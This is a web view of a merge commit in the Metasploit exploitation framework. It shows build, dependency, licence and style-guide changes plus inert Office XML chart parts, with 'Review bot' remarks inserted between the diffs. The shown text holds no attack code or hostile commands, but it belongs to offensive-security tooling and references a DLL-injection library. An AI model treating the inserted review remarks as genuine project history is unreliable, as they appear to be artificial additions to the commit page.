Land #2880, update unstable to master

unstable
William Vu 2014-01-14 11:43:47 -06:00
commit 00527019b2
No known key found for this signature in database
GPG Key ID: E761DCB4C1629024
734 changed files with 34829 additions and 9145 deletions

10
.gitignore vendored

@ -41,3 +41,13 @@ tags
*~
# Ignore backups of retabbed files
*.notab
# ignore Visual Studio external source garbage
*.suo
*.sdf
*.opensdf
*.user
# ignore release/debug folders for exploits
external/source/exploits/**/Debug
external/source/exploits/**/Release

3
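--- a/.gitmodules
+++ b/.gitmodules
@@ -0,0 +1,3 @@
+[submodule "external/source/ReflectiveDLLInjection"]
+path = external/source/ReflectiveDLLInjection
+url = https://github.com/rapid7/ReflectiveDLLInjection.git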
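Review bot: Nothing in this new file tells a reader that the code under `external/source/ReflectiveDLLInjection` is pinned only by the gitlink commit recorded in the superproject. A later change to that pin shows up as a one-line diff, which is easy to overlook in a merge of this size (734 changed files). A leading comment such as `# Pinned by commit; bump only in a reviewed PR that links the upstream changes` would make the expectation explicit. The URL itself uses https, which is the right choice for a build dependency fetched from another repository.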


@ -2,6 +2,7 @@ bturner-r7 <bturner-r7@github> Brandon Turner <brandon_turner@rapid7.com>
dmaloney-r7 <dmaloney-r7@github> David Maloney <David_Maloney@rapid7.com>
dmaloney-r7 <dmaloney-r7@github> David Maloney <DMaloney@rapid7.com> # aka TheLightCosine
ecarey-r7 <ecarey-r7@github> Erran Carey <e@ipwnstuff.com>
farias-r7 <farias-r7@github> Fernando Arias <fernando_arias@rapid7.com>
hmoore-r7 <hmoore-r7@github> HD Moore <hd_moore@rapid7.com>
hmoore-r7 <hmoore-r7@github> HD Moore <hdm@digitaloffense.net>
jlee-r7 <jlee-r7@github> egypt <egypt@metasploit.com> # aka egypt
@ -10,15 +11,18 @@ jlee-r7 <jlee-r7@github> James Lee <James_Lee@rapid7.com>
joev-r7 <joev-r7@github> joev <joev@metasploit.com>
joev-r7 <joev-r7@github> Joe Vennix <Joe_Vennix@rapid7.com>
jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan.vazquez@metasploit.com>
jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan_vazquez@rapid7.com>
limhoff-r7 <limhoff-r7@github> Luke Imhoff <luke_imhoff@rapid7.com>
shuckins-r7 <shuckins-r7@github> Samuel Huckins <samuel_huckins@rapid7.com>
tasos-r7 <tasos-r7@github> Tasos Laskos <Tasos_Laskos@rapid7.com>
todb-r7 <todb-r7@github> Tod Beardsley <tod_beardsley@rapid7.com>
todb-r7 <todb-r7@github> Tod Beardsley <todb@metasploit.com>
todb-r7 <todb-r7@github> Tod Beardsley <todb@packetfu.com>
trosen-r7 <trosen-r7@github> Trevor Rosen <Trevor_Rosen@rapid7.com>
wchen-r7 <wchen-r7@github> sinn3r <msfsinn3r@gmail.com> # aka sinn3r
wchen-r7 <wchen-r7@github> sinn3r <wei_chen@rapid7.com>
wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <William_Vu@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <wvu@metasploit.com>
wvu-r7 <wvu-r7@github> William Vu <wvu@nmt.edu>
# Above this line are current Rapid7 employees. Below this paragraph are
@ -39,8 +43,8 @@ Chao-mu <Chao-Mu@github> chao-mu <chao.mu@minorcrash.com>
Chao-mu <Chao-Mu@github> chao-mu <chao@confusion.(none)>
ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <chris.riley@c22.cc>
ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <reg@c22.cc>
corelanc0d3er <corelanc0d3er@github> corelanc0d3r <peter.ve@corelan.be>
corelanc0d3er <corelanc0d3er@github> Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
corelanc0d3r <corelanc0d3r@github> corelanc0d3r <peter.ve@corelan.be>
corelanc0d3r <corelanc0d3r@github> Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
darkoperator <darkoperator@github> Carlos Perez <carlos_perez@darkoperator.com>
efraintorres <efraintorres@github> efraintorres <etlownoise@gmail.com>
efraintorres <efraintorres@github> et <>
@ -67,11 +71,22 @@ nevdull77 <nevdull77@github> Patrik Karlsson <patrik@cqure.net>
nmonkee <nmonkee@github> nmonkee <dave@northern-monkee.co.uk>
nullbind <nullbind@github> nullbind <scott.sutherland@nullbind.com>
ohdae <ohdae@github> ohdae <bindshell@live.com>
OJ <oj@github> OJ Reeves <oj@buffered.io>
OJ <oj@github> OJ <oj@buffered.io>
r3dy <r3dy@github> Royce Davis <r3dy@Royces-MacBook-Pro.local>
r3dy <r3dy@github> Royce Davis <royce.e.davis@gmail.com>
Rick Flores <0xnanoquetz9l@gmail.com> Rick Flores (nanotechz9l) <0xnanoquetz9l@gmail.com>
rsmudge <rsmudge@github> Raphael Mudge <rsmudge@gmail.com> # Aka `butane
schierlm <schierlm@github> Michael Schierl <schierlm@gmx.de> # Aka mihi
scriptjunkie <scriptjunkie@github> Matt Weeks <scriptjunkie@scriptjunkie.us>
skape <skape@???> Matt Miller <mmiller@hick.org>
spoonm <spoonm@github> Spoon M <spoonm@gmail.com>
swtornio <swtornio@github> Steve Tornio <swtornio@gmail.com>
Tasos Laskos <Tasos_Laskos@rapid7.com> Tasos Laskos <Tasos_Laskos@rapid7.com>
TrustedSec <davek@trustedsec.com> trustedsec <davek@trustedsec.com>
# Aliases for utility author names. Since they're fake, typos abound
Tab Assassin <tabassassin@metasploit.com> Tabasssassin <tabassassin@metasploit.com>
Tab Assassin <tabassassin@metasploit.com> Tabassassin <tabassassin@metasploit.com>
Tab Assassin <tabassassin@metasploit.com> TabAssassin <tabasssassin@metasploit.com>


@ -1 +1 @@
1.9.3-p448
1.9.3-p484


@ -1,11 +1,13 @@
language: ruby
before_install:
- rake --version
- sudo apt-get update -qq
- sudo apt-get install -qq libpcap-dev
before_script:
- cp config/database.yml.travis config/database.yml
- rake db:create
- rake db:migrate
- bundle exec rake --version
- bundle exec rake db:create
- bundle exec rake db:migrate
rvm:
#- '1.8.7'

68
Gemfile

@ -2,6 +2,8 @@ source 'https://rubygems.org'
# Need 3+ for ActiveSupport::Concern
gem 'activesupport', '>= 3.0.0'
# Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
gem 'bcrypt-ruby'
# Needed for some admin modules (scrutinizer_add_user.rb)
gem 'json'
# Needed by msfgui and other rpc components
@ -14,50 +16,50 @@ gem 'robots'
gem 'packetfu', '1.1.9'
group :db do
# Needed for Msf::DbManager
gem 'activerecord'
# Database models shared between framework and Pro.
gem 'metasploit_data_models', '~> 0.16.6'
# Needed for module caching in Mdm::ModuleDetails
gem 'pg', '>= 0.11'
# Needed for Msf::DbManager
gem 'activerecord'
# Database models shared between framework and Pro.
gem 'metasploit_data_models', '~> 0.16.9'
# Needed for module caching in Mdm::ModuleDetails
gem 'pg', '>= 0.11'
end
group :pcap do
gem 'network_interface', '~> 0.0.1'
# For sniffer and raw socket modules
gem 'pcaprub'
# For sniffer and raw socket modules
gem 'pcaprub'
end
group :development do
# Markdown formatting for yard
gem 'redcarpet'
# generating documentation
gem 'yard'
# Markdown formatting for yard
gem 'redcarpet'
# generating documentation
gem 'yard'
end
group :development, :test do
# supplies factories for producing model instance for specs
# Version 4.1.0 or newer is needed to support generate calls without the
# 'FactoryGirl.' in factory definitions syntax.
gem 'factory_girl', '>= 4.1.0'
# Make rspec output shorter and more useful
gem 'fivemat', '1.2.1'
# running documentation generation tasks and rspec tasks
gem 'rake', '>= 10.0.0'
# supplies factories for producing model instance for specs
# Version 4.1.0 or newer is needed to support generate calls without the
# 'FactoryGirl.' in factory definitions syntax.
gem 'factory_girl', '>= 4.1.0'
# Make rspec output shorter and more useful
gem 'fivemat', '1.2.1'
# running documentation generation tasks and rspec tasks
gem 'rake', '>= 10.0.0'
end
group :test do
# Removes records from database created during tests. Can't use rspec-rails'
# transactional fixtures because multiple connections are in use so
# transactions won't work.
gem 'database_cleaner'
# testing framework
gem 'rspec', '>= 2.12'
gem 'shoulda-matchers'
# code coverage for tests
# any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
# see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0)
gem 'simplecov', '0.5.4', :require => false
# Manipulate Time.now in specs
gem 'timecop'
# Removes records from database created during tests. Can't use rspec-rails'
# transactional fixtures because multiple connections are in use so
# transactions won't work.
gem 'database_cleaner'
# testing framework
gem 'rspec', '>= 2.12'
gem 'shoulda-matchers'
# code coverage for tests
# any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
# see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0)
gem 'simplecov', '0.5.4', :require => false
# Manipulate Time.now in specs
gem 'timecop'
end
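Review bot: `gem 'bcrypt-ruby'` in the first hunk is added with no version constraint, so only Gemfile.lock (which resolves it to 3.1.2 in this commit) decides which release of a password-hashing library is installed. A `bundle update`, or an install without the lockfile, would accept any future release, including a major version with a changed API. Consider bounding it, for example `gem 'bcrypt-ruby', '~> 3.1'`, in line with how `metasploit_data_models` is constrained in the `:db` group. As far as this page shows, the rest of the section only re-indents the group bodies.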


@ -13,6 +13,7 @@ GEM
i18n (~> 0.6, >= 0.6.4)
multi_json (~> 1.0)
arel (3.0.2)
bcrypt-ruby (3.1.2)
builder (3.0.4)
database_cleaner (1.1.1)
diff-lcs (1.2.4)
@ -21,7 +22,7 @@ GEM
fivemat (1.2.1)
i18n (0.6.5)
json (1.8.0)
metasploit_data_models (0.16.6)
metasploit_data_models (0.16.9)
activerecord (>= 3.2.13)
activesupport
pg
@ -61,11 +62,12 @@ PLATFORMS
DEPENDENCIES
activerecord
activesupport (>= 3.0.0)
bcrypt-ruby
database_cleaner
factory_girl (>= 4.1.0)
fivemat (= 1.2.1)
json
metasploit_data_models (~> 0.16.6)
metasploit_data_models (~> 0.16.9)
msgpack
network_interface (~> 0.0.1)
nokogiri

54
HACKING

@ -36,13 +36,7 @@ lock up the entire module when called from other interfaces. If you
need user input, you can either register an option or expose an
interactive session type specific for the type of exploit.
3. Don't use "sleep". It has been known to cause issues with
multi-threaded programs on various platforms running an older version of
Ruby such as 1.8. Instead, we use "select(nil, nil, nil, <time>)" or
Rex.sleep() throughout the framework. We have found this works around
the underlying issue.
4. Always use Rex sockets, not ruby sockets. This includes
3. Always use Rex sockets, not ruby sockets. This includes
third-party libraries such as Net::Http. There are several very good
reasons for this rule. First, the framework doesn't get notified on
the creation of ruby sockets and won't know how to clean them up in
@ -54,48 +48,48 @@ already implemented with Rex and if the protocol you need is missing,
porting another library to use them is straight-forward. See our
Net::SSH modifications in lib/net/ssh/ for an example.
5. When opening an IO stream, always force binary with "b" mode (or
4. When opening an IO stream, always force binary with "b" mode (or
using IO#binmode). This not only helps keep Windows and non-Windows
runtime environments consistent with each other, but also guarantees
that files will be treated as ASCII-8BIT instead of UTF-8.
6. Don't use String#[] for a single character. This returns a Fixnum in
5. Don't use String#[] for a single character. This returns a Fixnum in
ruby 1.8 and a String in 1.9, so it's safer to use the following idiom:
str[idx,1]
str[idx,1]
which always returns a String. If you need the ASCII byte, unpack it like
so:
str[idx,1].unpack("C")[0]
so:
tr[idx,1].unpack("C")[0]
7. Whenever possible, avoid using '+' or '+=' to concatenate strings.
6. Whenever possible, avoid using '+' or '+=' to concatenate strings.
The '<<' operator is significantly faster. The difference will become
even more apparent when doing string manipulation in a loop. The
following table approximates the underlying implementation:
Ruby Pseudo-C
----------- ----------------
a = b + c a = malloc(b.len+c.len+1);
strcpy(a, b);
memcpy(a+b.len, c, c.len);
a[b.len + c.len] = '\0';
a = b a = b;
a << c a = realloc(a, a.len+c.len+1);
memcpy(a+a.len, c, c.len);
a[a.len + c.len] = '\0';
Ruby Pseudo-C
----------- ----------------
a = b + c a = malloc(b.len+c.len+1);
strcpy(a, b);
memcpy(a+b.len, c, c.len);
a[b.len + c.len] = '\0';
a = b a = b;
a << c a = realloc(a, a.len+c.len+1);
memcpy(a+a.len, c, c.len);
a[a.len + c.len] = '\0';
Note that the original value of 'b' is lost in the second case. Care
must be taken to duplicate strings that you do not want to modify.
8. For other Ruby 1.8.x/1.9.x compat issues, please see Sam Ruby's
7. For other Ruby 1.8.x/1.9.x compat issues, please see Sam Ruby's
excellent slide show at <http://slideshow.rubyforge.org/ruby19.html>
for an overview of common and not-so-common Ruby version related gotchas.
9. Never, ever use $global variables. This applies to modules, mixins,
8. Never, ever use $global variables. This applies to modules, mixins,
and libraries. If you need a "global" within a specific class, you can
use @@class_variables, but most modules should use @instance variables
to store information between methods.
10. Do not define CONSTANTS within individual modules. This can lead to
warning messages when the module is reloaded. Try to keep constants
inside libraries and mixins instead.
to store information between methods.
9. Don't craft your XML document raw or by using Nokogiri, the current
preferred way is REXML.
Creating New Modules
====================

87
LICENSE

@ -41,93 +41,10 @@ Copyright: 2004-2005 vlad902 <vlad902 [at] gmail.com>
2007 H D Moore <hdm [at] metasploit.com>
License: GPL-2 and Artistic
Files: external/source/meterpreter/ReflectiveDLLInjection/*
Copyright: 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
Files: external/source/ReflectiveDLLInjection/*
Copyright: 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
License: BSD-3-clause
Files: external/source/meterpreter/source/common/queue.h
Copyright: 1991, 1993 The Regents of the University of California
License: BSD-3-clause
Files: external/source/meterpreter/source/common/zlib/* external/source/meterpreter/source/server/zlib/*
Copyright: 1995-1996 Jean-loup Gailly and Mark Adler
License: Zlib
Files: external/source/meterpreter/source/bionic/libc/*
Copyright: 2005-2008, The Android Open Source Project
2004 by Internet Systems Consortium, Inc. ("ISC")
1995,1996,1999 by Internet Software Consortium
1995 by International Business Machines, Inc.
1997,1998,1999,2004 The NetBSD Foundation, Inc.
1993 Christopher G. Demetriou
1983,1985,1989,1993 The Regents of the University of California
2000 Ben Harris
1995,1996,1997,1998 WIDE Project
2003 Networks Associates Technology, Inc.
1993 by Digital Equipment Corporation
1997 Mark Brinicombe
1993 Martin Birgmeier
1993 by Sun Microsystems, Inc.
1997, 2005 Todd C. Miller <Todd.Miller@courtesan.com>
1995, 1996 Carnegie-Mellon University
2003 Networks Associates Technology, Inc.
License: BSD-3-clause and BSD-4-clause
Files: external/source/meterpreter/source/bionic/libdl/*
Copyright: 2007 The Android Open Source Project
License: BSD-3-clause
Files: external/source/meterpreter/source/bionic/libm/*
Copyright: 2003, Steven G. Kargl
2003 Mike Barcroft <mike@FreeBSD.org>
2002-2005 David Schultz <das@FreeBSD.ORG>
2004 Stefan Farfeleder
2003 Dag-Erling Coïdan Smørgrav
1996 The NetBSD Foundation, Inc.
1985,1988,1991,1992,1993 The Regents of the University of California
1993,94 Winning Strategies, Inc.
1993, 2004 by Sun Microsystems, Inc.
License: BSD-2-clause and BSD-3-clause and BSD-4-clause
Files: external/source/meterpreter/source/extensions/espia/screen.c
Copyright: 1994-2008, Mark Hammond
License: BSD-2-clause
Files: external/source/meterpreter/source/extensions/priv/server/timestomp.c
Copyright: 2005 Vincent Liu
License: GPL-2
Files: external/source/meterpreter/source/extensions/stdapi/server/webcam/bmp2jpeg.c external/source/meterpreter/source/screenshot/bmp2jpeg.c
Copyright: 1994-2008, Mark Hammond
License: BSD-2-clause
Files: external/source/meterpreter/source/extensions/stdapi/server/railgun/railgun.c
Copyright: 2010, patrickHVE@googlemail.com
License: BSD-2-clause
Files: external/source/meterpreter/source/pssdk/*
Copyright: microOLAP
License: N/A
Comment: HD Moore holds a single-seat developer license for the Packet Sniffer
SDK library embedded into the Meterpreter Sniffer extension. This
source code is not distributed with Metasploit Framework.
Files: external/source/meterpreter/source/openssl/*
Copyright: 1998-2002 The OpenSSL Project
License: OpenSSL and SSLeay
Files: external/source/meterpreter/source/server/posix/sfsyscall.h
Copyright: 2003 Philippe Biondi <biondi@cartel-securite.fr>
License: LGPL
Files: external/source/meterpreter/source/jpeg-8/*
Copyright: 1991-2010, Thomas G. Lane, Guido Vollbeding
License: BSD-3-clause
Files: external/source/meterpreter/source/libpcap/*
Copyright: 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997 The Regents of the University of California.
License: BSD-4-clause
Files: external/source/metsvc/*
Copyright: 2007, Determina Inc.
License: BSD-3-clause

Binary file not shown.

Binary file not shown.


@ -0,0 +1,6 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/>
<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/>
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>
</Relationships>


@ -0,0 +1,19 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
<Template>Normal.dotm</Template>
<TotalTime>4</TotalTime>
<Pages>1</Pages>
<Words>217</Words>
<Characters>1238</Characters>
<Application>Microsoft Office Word</Application>
<DocSecurity>0</DocSecurity>
<Lines>10</Lines>
<Paragraphs>2</Paragraphs>
<ScaleCrop>false</ScaleCrop>
<Company>home</Company>
<LinksUpToDate>false</LinksUpToDate>
<CharactersWithSpaces>1453</CharactersWithSpaces>
<SharedDoc>false</SharedDoc>
<HyperlinksChanged>false</HyperlinksChanged>
<AppVersion>12.0000</AppVersion>
</Properties>


@ -0,0 +1,8 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<dc:creator>Win7</dc:creator>
<cp:lastModifiedBy>Win7</cp:lastModifiedBy>
<cp:revision>1</cp:revision>
<dcterms:created xsi:type="dcterms:W3CDTF">2013-10-03T22:46:00Z</dcterms:created>
<dcterms:modified xsi:type="dcterms:W3CDTF">2013-10-03T23:17:00Z</dcterms:modified>
</cp:coreProperties>


@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet1.xlsx"/>
</Relationships>


@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet2.xlsx"/>
</Relationships>


@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet3.xlsx"/>
</Relationships>


@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet4.xlsx"/>
</Relationships>


@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet5.xlsx"/>
</Relationships>


@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet6.xlsx"/>
</Relationships>


@ -0,0 +1,230 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<c:lang val="en-US"/>
<c:chart>
<c:view3D>
<c:perspective val="30"/>
</c:view3D>
<c:plotArea>
<c:layout/>
<c:bar3DChart>
<c:barDir val="col"/>
<c:grouping val="standard"/>
<c:ser>
<c:idx val="0"/>
<c:order val="0"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$B$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 1</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$B$2:$B$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>4.3</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2.5</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3.5</c:v>
</c:pt>
<c:pt idx="3">
<c:v>4.5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="1"/>
<c:order val="1"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$C$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 2</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$C$2:$C$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2.4</c:v>
</c:pt>
<c:pt idx="1">
<c:v>4.4000000000000004</c:v>
</c:pt>
<c:pt idx="2">
<c:v>1.8</c:v>
</c:pt>
<c:pt idx="3">
<c:v>2.8</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="2"/>
<c:order val="2"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$D$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 3</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$D$2:$D$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:shape val="cylinder"/>
<c:axId val="51657728"/>
<c:axId val="69190400"/>
<c:axId val="25292288"/>
</c:bar3DChart>
<c:catAx>
<c:axId val="51657728"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="69190400"/>
<c:crosses val="autoZero"/>
<c:auto val="1"/>
<c:lblAlgn val="ctr"/>
<c:lblOffset val="100"/>
</c:catAx>
<c:valAx>
<c:axId val="69190400"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="l"/>
<c:majorGridlines/>
<c:numFmt formatCode="General" sourceLinked="1"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="51657728"/>
<c:crosses val="autoZero"/>
<c:crossBetween val="between"/>
</c:valAx>
<c:serAx>
<c:axId val="25292288"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="69190400"/>
<c:crosses val="autoZero"/>
</c:serAx>
</c:plotArea>
<c:legend>
<c:legendPos val="r"/>
<c:layout/>
</c:legend>
<c:plotVisOnly val="1"/>
</c:chart>
<c:externalData r:id="rId1"/>
</c:chartSpace>


@ -0,0 +1,220 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<c:lang val="en-US"/>
<c:chart>
<c:view3D>
<c:rAngAx val="1"/>
</c:view3D>
<c:plotArea>
<c:layout/>
<c:bar3DChart>
<c:barDir val="col"/>
<c:grouping val="clustered"/>
<c:ser>
<c:idx val="0"/>
<c:order val="0"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$B$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 1</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$B$2:$B$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>4.3</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2.5</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3.5</c:v>
</c:pt>
<c:pt idx="3">
<c:v>4.5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="1"/>
<c:order val="1"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$C$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 2</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$C$2:$C$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2.4</c:v>
</c:pt>
<c:pt idx="1">
<c:v>4.4000000000000004</c:v>
</c:pt>
<c:pt idx="2">
<c:v>1.8</c:v>
</c:pt>
<c:pt idx="3">
<c:v>2.8</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="2"/>
<c:order val="2"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$D$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 3</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$D$2:$D$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>5</c:v>
</c:pt>
